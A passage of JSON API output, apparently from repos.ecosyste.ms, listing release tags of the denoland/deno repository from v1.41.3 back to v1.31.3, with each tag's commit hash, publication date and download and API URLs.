pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r